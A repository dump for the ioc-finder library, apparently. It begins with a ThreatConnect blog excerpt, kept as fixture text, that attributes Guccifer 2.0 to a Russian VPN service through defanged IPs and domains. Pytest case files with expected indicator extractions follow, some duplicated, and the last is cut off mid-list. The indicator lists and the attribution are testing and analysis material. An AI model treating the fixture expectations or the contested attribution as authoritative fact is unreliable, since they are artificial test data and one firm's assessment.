 49 | These seven IP addresses are all connected by the same SSH fingerprint, so another interesting line of inquiry is to look at those neighbors to see if we can deduce anything useful about the Guccifer 2.0 IP address. Using ThreatConnect’s Farsight Security Passive DNS integration, we see one of our IP addresses of interest – 95.130.9[.]198 – has previously hosted the domain fr1.vpn-service[.]us since February 2015. The naming convention is consistent with our working hypothesis that Guccifer 2.0 is leveraging French-based VPN infrastructure to communicate with journalists.
 50 | 
 51 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 3
 52 | Next, we turned to our friends at DomainTools to examine the registrant information behind the fr1.vpn-service[.]us domain.  We quickly found more evidence to support our previous research that Guccifer 2.0 maintains Russian origins.
 53 | 
 54 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 2004 VPN
 55 | In the figure above, the current domain resolution for vpn-service[.]us is seemingly associated with a New York-based registrant named James Dermount, operating under Security and Host Ltd. We can also see this domain was registered in 2004, and was last updated in March of 2015 with an expiration date of 2019.
 56 | 
 57 | When we compare that information with the DomainTools screenshot below of the original 2004 registration, Russia themes continue to emerge. We can see our same New York-based registrant James Dermount, but this time operating under VPN Services Inc. This 2004 record lists the registrant email as sec.service@mail[.]ru, which uses the free Russian webmail service mail.ru and was previously referenced in Russian language forums related to job postings and automobiles. The latter of those forums associates the username “Антон_Харьков” (Anton_Harkov, of the Iron Man franchise) with the email address.
 58 | 
 59 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 4
 60 | The name server used in the 2004 vpn-service[.]us registration is listed as xocma[.]net – also different from the 2016 record. The xocma[.]net domain lists Moscow-based Azer Karyagdy and TK Rustelekom LLC as the registrant name and organization. For more information about leveraging name servers for analysis, see our blog post here.
 61 | 
 62 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 5
 63 | According to DomainTools Historic Whois, in September 2007 the same registrant also registered vpn-security[.]us with the same phone number and a vpn_support@mail[.]ru email account. Finally, the domain vpn-service[.]com also leads to the Elite VPN website and is hosted on the same IP as vpn-service[.]us but was most recently registered using a privacy protection service.
 64 | 
 65 | Getting to Know Russia’s Elite VPN Services
 66 | Browsing to vpn-service[.]us, we find a Russian language webpage for Elite VPN Services. The site mentions that English language support is available via email and ICQ. CORRECTION: The site offers an English language translation when Javascript is enabled in a browser.
 67 | 
 68 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 6
 69 | We created an account on the Elite VPN Service and were able to see which VPN nodes are offered from within France. From here, we confirmed the SSH Fingerprint we identified from Guccifer 2.0’s email is unique to Elite VPN Service. All of the Elite VPN Service nodes offered in their web interface and the IP address used by Guccifer 2.0 to communicate via email returned the same SSH fingerprint.
 70 | 
 71 | It is important to note that the IP address seen in the Guccifer 2.0 AOL communications – 95.130.15[.]34 – is not listed as an option within Elite VPN Service, although it has an identical SSH fingerprint and has the exact same port (1723, PPTP) open as the listed options. This demonstrates the server was cloned from the same server image as all the Elite VPN servers but may be a private or dedicated version of the service.
 72 | 
 73 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia IPS
 74 | Based on this information, we can confirm that Guccifer 2.0 is using the Russia-based Elite VPN Service, and is able to leverage IP infrastructure that is not available to other users. We cannot identify whether the 95.130.15[.]34 IP address is used exclusively by the individual(s) behind Guccifer 2.0, and consequently any activity associated with the IP address may not be indicative of Guccifer 2.0 activity. The persona’s continued use of the IP address or additional information on Elite VPN’s service offerings could help us identify the extent to which the address is exclusively used by Russian actors. However, for now, the IP itself merits further investigation.
 75 | 
 76 | WHITE PAPER: MATURING A THREAT INTELLIGENCE PROGRAM
 77 | There are no readily available details of known host resolution history for the 95.130.15[.]34 IP; however, we can find incidental evidence that it has been used in previous malicious activity. This activity includes Russian bride scams from October 2014 as well as WordPress bruteforcing in October 2015. Interestingly we also find references to this IP address within a current EDR Coin Cryptocurrency EDRC nodelist.
 78 | 
 79 | ThreatConnect Research Guccifer 2.0: All Roads Lead to Russia 8
 80 | Finally, the Guccifer 2.0 AOL IP Address 95.130.15[.]34 can also be found referenced within an online SMS messaging proxy service which contains a series of Russian language SMS messages that date back to August 2015. The specific message mentioning 95.130.15[.]34 appears to be an automatic message that states that “a text message ‘1’ from www.smsc[.]ru has been scheduled from IP 95.130.15[.]34”. If it turns out that the 95.130.15[.]34 VPN IP is exclusively used by the individuals or organization behind Guccifer 2.0, this previous activity may provide investigative leads that could ferret out additional information on those actors.
 81 | 
 82 | Conclusion:
 83 | ThreatConnect is the first to identify and detail analysis of Guccifer 2.0’s operational infrastructure. In our original hypothesis, we suspected Guccifer 2.0 might be leveraging French infrastructure to communicate with the global media, and we have validated this finding with the help of the media. As more details continue to surface surrounding Guccifer 2.0, we continue to identify heavy traces of Russian activity, from the specific Russian-based VPN service provider, domain registrants, and registrars as well as various discrete events that have circumstantial marks of Russian origins.
 84 | 
 85 | As we pointed out in our previous analysis, we conclude Guccifer 2.0 is an apparition created under a hasty Russian D&D campaign, which has clearly evolved into an Active Measures Campaign. Those who are operating under the Guccifer 2.0 Twitter, WordPress and Email communications are likely made up of a cadre of non-technical politruk attempting to establish “Guccifer 2.0” as a static fixture on the world stage alongside the likes of Manning, Assange or Snowden. Their use of Russian VPN services with French infrastructure may shed light on a method Russian intelligence operatives use — domestic services coupled with foreign infrastructure — to help hide their hand and deter any potential attribution to Russia.
 86 | 
 87 | Guccifer 2.0 has subsequently claimed responsibility, both publicly and privately, for the 19,000+ DNC emails posted on Wikileaks on 22 July, and it appears that his persona is not fading in the run up to the election. The execution of Guccifer 2.0’s campaign thus far is rife with errors that have allowed us to attribute this persona to Russian-based infrastructure.
 88 | 
 89 | Maintaining a ruse of this nature within both the physical and virtual domains requires believable and verifiable events which do not contradict one another. That is not the case here. Our research into Guccifer 2.0’s infrastructure further solidifies our assessment that the persona is a Russia-controlled platform that can act as a censored hacktivist. Moscow determines what Guccifer 2.0 shares and thus can attempt to selectively impact media coverage, and potentially the election, in a way that ultimately benefits their national objectives.
 90 | 
 91 | Update 07/26/2016  4:00pm EDT
 92 | In our initial review of the infrastructure that the Russian persona Guccifer 2.0 used to communicate with journalists, we identified that they had used a Russian VPN service to connect to the France-based IP address 95.130.15[.]34. We assessed that this activity indicated the Russian actors behind Guccifer 2.0 probably use the Russian VPN as part of their security practices on a regular basis. At the time we also hypothesized that the French IP may be exclusive to the actors behind Guccifer 2.0, but could not confirm that as we would need additional information to make such a determination. Thankfully, Joe Uchill with The Hill, who has previously covered Guccifer 2.0 and the Wikileaks DNC data dump, has provided us with redacted information on his communications with Guccifer 2.0 that has raised our confidence in our current assessments and hypotheses.
 93 | 
 94 | Check out Joe’s story here.
 95 | 
 96 | One email from Guccifer 2.0 leveraged ProtonMail, a free encrypted email client. Analyzing a second, more recent email from Guccifer 2.0 in the ThreatConnect platform, we were able to identify that the actors behind the Guccifer 2.0 persona used a 1&1 mail.com email address to send an encrypted email message from the same French IP (95.130.15[.]34). This communication occurred over a week after the email referenced in our initial review. These findings, which have been shared in ThreatConnect, have implications for two of our previous assessments:
 97 | 
 98 | guccifer-update-russia-dnc
 99 |  
100 | 
101 | Elite VPN Part of Russian OPSEC
102 | 
103 | Using the same IP address with a different email address several days later suggests that the actors behind Guccifer 2.0 have operational security (OPSEC) procedures in place to specifically use the Russian Elite VPN service. This raises our confidence in our assessment that using the Elite VPN service is a practice that the actors behind Guccifer 2.0 leverage in an effort to hide their true identities. Their repeated use of the French IP address suggests that the Russian actors also have an OPSEC practice in place to connect to that specific IP address, rather than using infrastructure from other locations.
104 | 
105 | Exclusivity to Russian Actors
106 | 
107 | Their continued use of this IP, coupled with the fact that it is not available for other Elite VPN users, strengthens –but does not confirm– the notion that the IP is exclusively used by the Russian actors behind Guccifer 2.0. If connecting to this specific IP is a part of their OPSEC, then the Russian actors probably would have procured VPN services with this IP address for their sole use. By doing so, they could ensure that the services at that IP would not be overburdened by other users.
108 | 
109 | Conclusion
110 | 
111 | These actors’ consistent use of the Russian Elite VPN service is just another indicator that Guccifer 2.0 is not who or what he claims to be. There is still not enough evidence to confirm that this French IP is used exclusively by the individuals behind Guccifer 2.0. However, if it can be verified that the 95.130.15[.]34 VPN IP is exclusively used by the individuals or organization behind Guccifer 2.0, there are some significant leads — phone numbers, websites, and previous malicious activity — that may help us identify more information about those actors. Finally, as the actors behind Guccifer 2.0 continue to develop the persona, we would expect to see their OPSEC practices similarly develop to reduce the amount of visibility we can gain into their operations.
112 | 
113 | Read the full series of ThreatConnect posts following the DNC Breach: “Rebooting Watergate: Tapping into the Democratic National Committee“, “Shiny Object? Guccifer 2.0 and the DNC Breach“, “What’s in a Name Server?“, “Guccifer 2.0: the Man, the Myth, the Legend?“, “Guccifer 2.0: All Roads Lead to Russia“, “FANCY BEAR Has an (IT) Itch that They Can’t Scratch“, “Does a BEAR Leak in the Woods?“, “Russian Cyber Operations on Steroids“, and “Can a BEAR Fit Down a Rabbit Hole?“.
114 | 
115 | 
116 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/__init__.py:
--------------------------------------------------------------------------------
 1 | from .asns import ASN_DATA
 2 | from .attack_data import ATTACK_DATA
 3 | from .coins import COIN_DATA
 4 | from .cves import CVE_DATA
 5 | from .domains import DOMAIN_DATA
 6 | from .email import EMAIL_DATA
 7 | from .feature__included_ioc_types import individual_included_ioc_types_tests, multiple_included_ioc_types_tests
 8 | from .file_paths import PATH_DATA
 9 | from .hashes import HASH_DATA
10 | from .ids import ID_DATA
11 | from .ip_addr import IP_DATA
12 | from .mac_addr import MAC_DATA
13 | from .registry_keys import REGISTRY_DATA
14 | from .tlp_labels import TLP_DATA
15 | from .urls import URL_DATA
16 | from .user_agents import UA_DATA
17 | 
18 | cases = [  # one entry per imported case collection; this order is the order of ALL_TESTS
19 |     TLP_DATA,
20 |     individual_included_ioc_types_tests,
21 |     multiple_included_ioc_types_tests,
22 |     DOMAIN_DATA,
23 |     EMAIL_DATA,
24 |     HASH_DATA,
25 |     CVE_DATA,
26 |     IP_DATA,
27 |     ASN_DATA,
28 |     ATTACK_DATA,
29 |     REGISTRY_DATA,
30 |     PATH_DATA,
31 |     ID_DATA,
32 |     COIN_DATA,
33 |     MAC_DATA,
34 |     URL_DATA,
35 |     UA_DATA,
36 | ]
37 | 
38 | ALL_TESTS = [val for sublist in cases for val in sublist]  # flatten `cases` one level into a single list
39 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/asns.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | ASN_DATA = [  # each case: param(input text, expected result dict, third dict (presumably parser options; confirm in the consuming test), id=...)
 4 |     param("as1234", {"asns": ["ASN1234"]}, {}, id="asn_1"),  # every accepted spelling below expects the same "ASN1234" form
 5 |     param("asn1234", {"asns": ["ASN1234"]}, {}, id="asn_2"),
 6 |     param("asn 1234", {"asns": ["ASN1234"]}, {}, id="asn_3"),
 7 |     param("AS1234", {"asns": ["ASN1234"]}, {}, id="asn_4"),
 8 |     param("AS 1234", {"asns": ["ASN1234"]}, {}, id="asn_5"),
 9 |     param("ASN 1234", {"asns": ["ASN1234"]}, {}, id="asn_6"),
10 |     param('here is an asn: "AS1234', {"asns": ["ASN1234"]}, {}, id="asn_7"),  # input has a leading double quote before the ASN
11 |     param("NWD2HUBCAS1234.ad.analog.com", {"domains": ["nwd2hubcas1234.ad.analog.com"]}, {}, id="asn_8"),  # "AS1234" inside a hostname: only the domain is expected, no "asns" key
12 |     param("here is an asn: AS1234foobar", {}, {}, id="asn_9"),  # letters directly after the number: empty result expected
13 |     param("as1234", {"asns": ["ASN1234"]}, {}, id="asn_10"),  # NOTE(review): same input and expectation as asn_1
14 |     param("just as 2014", {}, {}, id="asn_11"),  # empty result expected for this sentence fragment
15 | ]
16 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/attack_data.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | ATTACK_DATA = [  # each case: param(input text, expected result dict, third dict (presumably parser options; confirm in the consuming test), id=...)
 4 |     param(
 5 |         """Mitigations: 41
 6 |         ID  Name    Description
 7 |         M1036   Account Use Policies
 8 |         Configure features related to account use like login attempt lockouts, specific login times, etc.
 9 | 
10 |         M1015   Active Directory Configuration
11 |         Configur""",
12 |         {"attack_mitigations": {"enterprise": ["M1036", "M1015"]}},  # expected ids are grouped under a category key ("enterprise" here)
13 |         {},
14 |         id="attack_data_1",
15 |     ),
16 |     param(
17 |         """ Name    Description
18 |         M1013   Application Developer Guidance
19 |         This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.
20 | 
21 |         M1005   Application Vetting
22 |         Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect appl""",
23 |         {"attack_mitigations": {"enterprise": ["M1013"], "mobile": ["M1013", "M1005"]}},  # M1013 is expected under both categories, M1005 only under "mobile"
24 |         {},
25 |         id="attack_data_2",
26 |     ),
27 |     param(
28 |         """
29 |         ID  Name    Description
30 |         T1329   Acquire and/or use 3rd party infrastructure services
31 |         A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down.
32 | 
33 |         T1307   Acquire and/or use 3rd party infrastructure services
34 |         A wide variety of cloud, virtual private services, hosting, compute, and storage solutions are available. Additionally botnets are available for rent or purchase. Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down.
35 | 
36 |         T1308""",
37 |         {"attack_techniques": {"pre_attack": ["T1329", "T1307", "T1308"]}},  # includes T1308, which ends the input with no text after it
38 |         {},
39 |         id="attack_pattern_3",
40 |     ),
41 |     param(
42 |         """
43 |         ID  Name    Description
44 |         TA0012  Priority Definition Planning    Priority definition planning consists of the process of determining the set of Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) required for meeting key strategic, operational, or tactical goals. Leadership outlines the priority definition (may be considered a goal) around which the adversary designs target selection and a plan to achieve. An analyst may outline the priority definition when in the course of determining gaps in existing KITs or KIQs.
45 |         TA0013  Priority Definition Direction   Priority definition direction consists of the process of collecting and assigning requirements for meeting Key Intelligence Topics (KIT) or Key Intelligence Questions (KIQ) as determined by leadership.
46 |         TA0014  Targ""",
47 |         {"attack_tactics": {"pre_attack": ["TA0012", "TA0013", "TA0014"]}},
48 |         {},
49 |         id="attack_pattern_4",
50 |     ),
51 |     param("""FOOT1329""", {}, {}, id="attack_pattern_5"),  # id preceded by other letters: empty result expected
52 |     param("""T1329FUN""", {}, {}, id="attack_pattern_6"),  # id followed by other letters: empty result expected
53 |     param("""foot1329""", {}, {}, id="attack_pattern_7"),
54 |     param("""t1329""", {"attack_techniques": {"pre_attack": ["T1329"]}}, {}, id="attack_pattern_8"),  # lowercase input, uppercase expected
55 |     param("T1156", {"attack_techniques": {"enterprise": ["T1156"]}}, {}, id="attack_pattern_9"),
56 |     param("AT0001", {}, {}, id="attack_pattern_10"),  # letters in the order "AT" rather than "TA": empty result expected
57 |     param("TA0001FUN", {}, {}, id="attack_pattern_11"),
58 |     param("foota0001", {}, {}, id="attack_pattern_12"),
59 |     param("ta0001", {"attack_tactics": {"enterprise": ["TA0001"]}}, {}, id="attack_pattern_13"),  # lowercase input, uppercase expected
60 |     param(
61 |         "https://attack.mitre.org/tactics/TA0001/",
62 |         {
63 |             "attack_tactics": {"enterprise": ["TA0001"]},  # tactic id is expected even though it sits in a URL path
64 |             "urls": ["https://attack.mitre.org/tactics/TA0001/"],
65 |             "domains": ["attack.mitre.org"],
66 |         },
67 |         {},
68 |         id="attack_pattern_14",
69 |     ),
70 |     param("T1546.004", {"attack_techniques": {"enterprise": ["T1546.004"]}}, {}, id="attack_pattern_15"),  # three-digit ".004" suffix is kept in the expected id
71 |     param("T1156.0012", {}, {}, id="attack_pattern_16"),  # four-digit suffix: empty result expected
72 | ]
73 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/coins.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | COIN_DATA = [
 4 |     param(
 5 |         """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2.
 6 |         P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy.
 7 |         Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq""",
 8 |         {
 9 |             "bitcoin_addresses": [
10 |                 "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2",
11 |                 "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
12 |                 "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
13 |             ]
14 |         },
15 |         {},
16 |         id="bitcoin_address_1",
17 |     ),
18 |     param(
19 |         """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2.
20 |         P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy.
21 |         Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq""",
22 |         {
23 |             "bitcoin_addresses": [
24 |                 "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2",
25 |                 "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
26 |                 "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
27 |             ]
28 |         },
29 |         {},
30 |         id="bitcoin_address_1",
31 |     ),
32 |     param(
33 |         """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2.
34 |         P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy.
35 |         Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq""",
36 |         {
37 |             "bitcoin_addresses": [
38 |                 "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2",
39 |                 "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
40 |                 "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
41 |             ]
42 |         },
43 |         {},
44 |         id="bitcoin_address_1",
45 |     ),
46 |     param(
47 |         """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2.
48 |         P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy.
49 |         Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq""",
50 |         {
51 |             "bitcoin_addresses": [
52 |                 "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2",
53 |                 "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy",
54 |                 "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq",
55 |             ]
56 |         },
57 |         {},
58 |         id="bitcoin_address_1",
59 |     ),
60 |     param(
61 |         "496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp",
62 |         {
63 |             "monero_addresses": [
64 |                 "496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp"
65 |             ]
66 |         },
67 |         {},
68 |         id="monero_1",
69 |     ),
70 |     param(
71 |         "49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk 498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh",
72 |         {
73 |             "monero_addresses": [
74 |                 "49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk",
75 |                 "498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh",
76 |             ]
77 |         },
78 |         {},
79 |         id="monero_2",
80 |     ),
81 | ]
82 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/cves.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | CVE_DATA = [  # each case: param(input text, expected result dict, third dict (presumably parser options; confirm in the consuming test), id=...)
 4 |     param(
 5 |         "cve-2014-1000 cve 2014-1001 cve-1999-1002 CVE 2999-1003 CVE 1928-1004",  # mixes upper/lower case and "cve-"/"cve " separators
 6 |         {"cves": ["CVE-2014-1000", "CVE-2014-1001", "CVE-1999-1002", "CVE-2999-1003", "CVE-1928-1004"]},  # all expected in upper-case, hyphenated form
 7 |         {},
 8 |         id="cve_1",
 9 |     )
10 | ]
11 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/domains.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | DOMAIN_DATA = [  # each case: param(input text, expected result dict, third dict of option flags (presumably passed to the parser; confirm in the consuming test), id=...)
 4 |     param(
 5 |         "this is just a (google.com) test of example.com", {"domains": ["google.com", "example.com"]}, {}, id="domain_1"
 6 |     ),
 7 |     param(
 8 |         "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
 9 |         {
10 |             "domains": ["asf.goole.com", "cba0019_file_00002_pdf.zip", "freasdfuewriter.com", "uniddloos.zddfdd.org"],  # includes the domain that appears percent-encoded in the query string
11 |             "urls": [
12 |                 "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
13 |             ],
14 |         },
15 |         {},
16 |         id="domain-issue_104__domains_read_from_percent_encoded_url_query_params",
17 |     ),
18 |     param(
19 |         "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
20 |         {
21 |             "urls": [
22 |                 "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
23 |             ],
24 |             "domains": ["cba0019_file_00002_pdf.zip", "freasdfuewriter.com", "uniddloos.zddfdd.org"],  # same input as above, but asf.goole.com (the URL's own host) is not expected
25 |         },
26 |         {"parse_domain_from_url": False},
27 |         id="domain-issue_104__domains_read_from_percent_encoded_url_query_params__with_options_false",
28 |     ),
29 |     param(
30 |         "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
31 |         {
32 |             "domains": ["asf.goole.com", "cba0019_file_00002_pdf.zip", "freasdfuewriter.com", "uniddloos.zddfdd.org"],  # identical to the expectation of the first issue_104 case
33 |             "urls": [
34 |                 "https://asf.goole.com/mail?url=http%3A%2F%2Ffreasdfuewriter.com%2Fcs%2Fimage%2FCommerciaE.jpg&t=1575955624&ymreqid=733bc9eb-e8f-34cb-1cb5-120010019e00&sig=x2Pa2oOYxanG52s4vyCEFg--~Chttp://uniddloos.zddfdd.org/CBA0019_file_00002_pdf.zip",
35 |             ],
36 |         },
37 |         {"parse_from_url_path": False},
38 |         id="domain-issue_104__domains_read_from_percent_encoded_url_query_params__with_options_false_2",
39 |     ),
40 |     param(
41 |         "%2Ffreasdfuewriter.com",
42 |         {"domains": ["2ffreasdfuewriter.com"]},  # outside a URL the "%2F" is not decoded: "2f" stays in the expected domain
43 |         {},
44 |         id="domain-percent_encoding_not_unquoted_if_not_in_url",
45 |     ),
46 |     param(
47 |         "freasdfuewriter.com%2F",
48 |         {"domains": ["freasdfuewriter.com"]},  # trailing "%2F" is not part of the expected domain
49 |         {},
50 |         id="domain-percent_encoding_not_unquoted_if_not_in_url_2",
51 |     ),
52 |     # See https://github.com/fhightower/ioc-finder/issues/91.
53 |     param(
54 |         "1.1.1.1/0 foobar.com/test/bingo.php",
55 |         {
56 |             "urls": ["foobar.com/test/bingo.php"],  # scheme-less URL is expected; "1.1.1.1/0" is expected as a CIDR, not a URL
57 |             "domains": ["foobar.com"],
58 |             "ipv4_cidrs": ["1.1.1.1/0"],
59 |             "ipv4s": ["1.1.1.1"],
60 |         },
61 |         {},
62 |         id="url_cidr_1",
63 |     ),
64 | ]
65 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/email.py:
--------------------------------------------------------------------------------
 1 | from pytest import param
 2 | 
 3 | EMAIL_DATA = [  # each case: param(input text, expected result dict, third dict of option flags (presumably passed to the parser; confirm in the consuming test), id=...)
 4 |     param(
 5 |         "a@example.com test@a.com bingo@en.wikipedia.com foo@a.com'.format('a'*63 bar@b.a.com'.format('a'*63, 'a'*63 bad@test-ing.com me@2600.com john.smith(comment)@example.com (comment)john.smith@example.com \"John..Doe\"@example.com' test@[192.168.0.1]",
 6 |         {
 7 |             "email_addresses": [  # simplified form: no "(comment)" parts, and the quoted "John..Doe" address is absent
 8 |                 "a@example.com",
 9 |                 "bad@test-ing.com",
10 |                 "bar@b.a.com",
11 |                 "bingo@en.wikipedia.com",
12 |                 "foo@a.com",
13 |                 "john.smith@example.com",
14 |                 "me@2600.com",
15 |                 "test@[192.168.0.1]",
16 |                 "test@a.com",
17 |             ],
18 |             "email_addresses_complete": [  # addresses as written in the input, including comments and the quoted local part
19 |                 "a@example.com",
20 |                 "test@a.com",
21 |                 "bingo@en.wikipedia.com",
22 |                 "foo@a.com",
23 |                 "bar@b.a.com",
24 |                 "bad@test-ing.com",
25 |                 "me@2600.com",
26 |                 "john.smith(comment)@example.com",
27 |                 "(comment)john.smith@example.com",
28 |                 '"John..Doe"@example.com',
29 |                 "test@[192.168.0.1]",
30 |             ],
31 |             "ipv4s": ["192.168.0.1"],  # the IP literal inside test@[192.168.0.1] is also expected on its own
32 |             "domains": ["a.com", "en.wikipedia.com", "b.a.com", "test-ing.com", "2600.com", "example.com"],
33 |         },
34 |         {},
35 |         id="email_1",
36 |     ),
37 |     param(
38 |         "foo@swissjabber.de bar@jabber.zone bom@jabber.sow.as me@example.com",
39 |         {
40 |             "xmpp_addresses": ["foo@swissjabber.de", "bar@jabber.zone", "bom@jabber.sow.as"],  # these three are expected as XMPP addresses, not email addresses
41 |             "domains": ["swissjabber.de", "jabber.zone", "jabber.sow.as", "example.com"],
42 |             "email_addresses": ["me@example.com"],
43 |             "email_addresses_complete": ["me@example.com"],
44 |         },
45 |         {},
46 |         id="xmpp_1",
47 |     ),
48 |     param(
49 |         "foo@swissjabber.de bar@jabber.zone bom@jabber.sow.as me@example.com",
50 |         {
51 |             "xmpp_addresses": ["foo@swissjabber.de", "bar@jabber.zone", "bom@jabber.sow.as"],
52 |             "email_addresses": ["me@example.com"],
53 |             "email_addresses_complete": ["me@example.com"],
54 |         },
55 |         {"parse_domain_name_from_xmpp_address": False, "parse_domain_from_email_address": False},  # same input as xmpp_1; with both flags off no "domains" key is expected
56 |         id="xmpp_2",
57 |     ),
58 | ]
59 | 


--------------------------------------------------------------------------------
/tests/find_iocs_cases/feature__included_ioc_types.py:
--------------------------------------------------------------------------------
  1 | """These tests make sure the included_ioc_types parameter is working properly.
  2 | 
  3 | Each test below passes a string with two IOC types into the find_iocs function, but only specifies one `included_ioc_types` argument to ensure it is handled properly."""
  4 | 
  5 | from pytest import param
  6 | 
  7 | from ioc_finder.ioc_finder import DEFAULT_IOC_TYPES
  8 | 
  9 | IOC_EXAMPLES = {
 10 |     "domains": ["abc.py", "bar.com", "example.com", "foo.com", "swissjabber.de"],
 11 |     "urls": ["https://example.com/test%20page/foo.com/bingo.php?q=bar.com"],
 12 |     "xmpp_addresses": ["foo@swissjabber.de"],
 13 |     "email_addresses_complete": ["me@example.com"],
 14 |     "email_addresses": ["me@example.com"],
 15 |     "ipv4_cidrs": ["1.1.1.1/0"],
 16 |     "imphashes": ["18ddf28a71089acdbab5038f58044c0a"],
 17 |     "authentihashes": ["3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4"],
 18 |     "ipv4s": ["1.1.1.1"],
 19 |     "ipv6s": ["2001:0db8:0000:0000:0000:ff00:0042:8329"],
 20 |     "sha512s": ["a" * 128],
 21 |     "sha256s": ["a" * 64],
 22 |     "sha1s": ["a" * 40],
 23 |     "md5s": ["a" * 32],
 24 |     "ssdeeps": [
 25 |         "12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F",
 26 |         "0000:0000:ff00",
 27 |         "2001:0db8:0000",
